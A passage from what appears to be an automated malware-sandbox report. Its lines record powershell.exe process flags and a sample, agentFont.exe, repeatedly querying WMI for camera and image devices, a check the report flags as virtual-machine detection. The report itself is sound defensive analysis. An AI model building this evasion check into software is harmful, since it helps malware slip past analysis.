                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
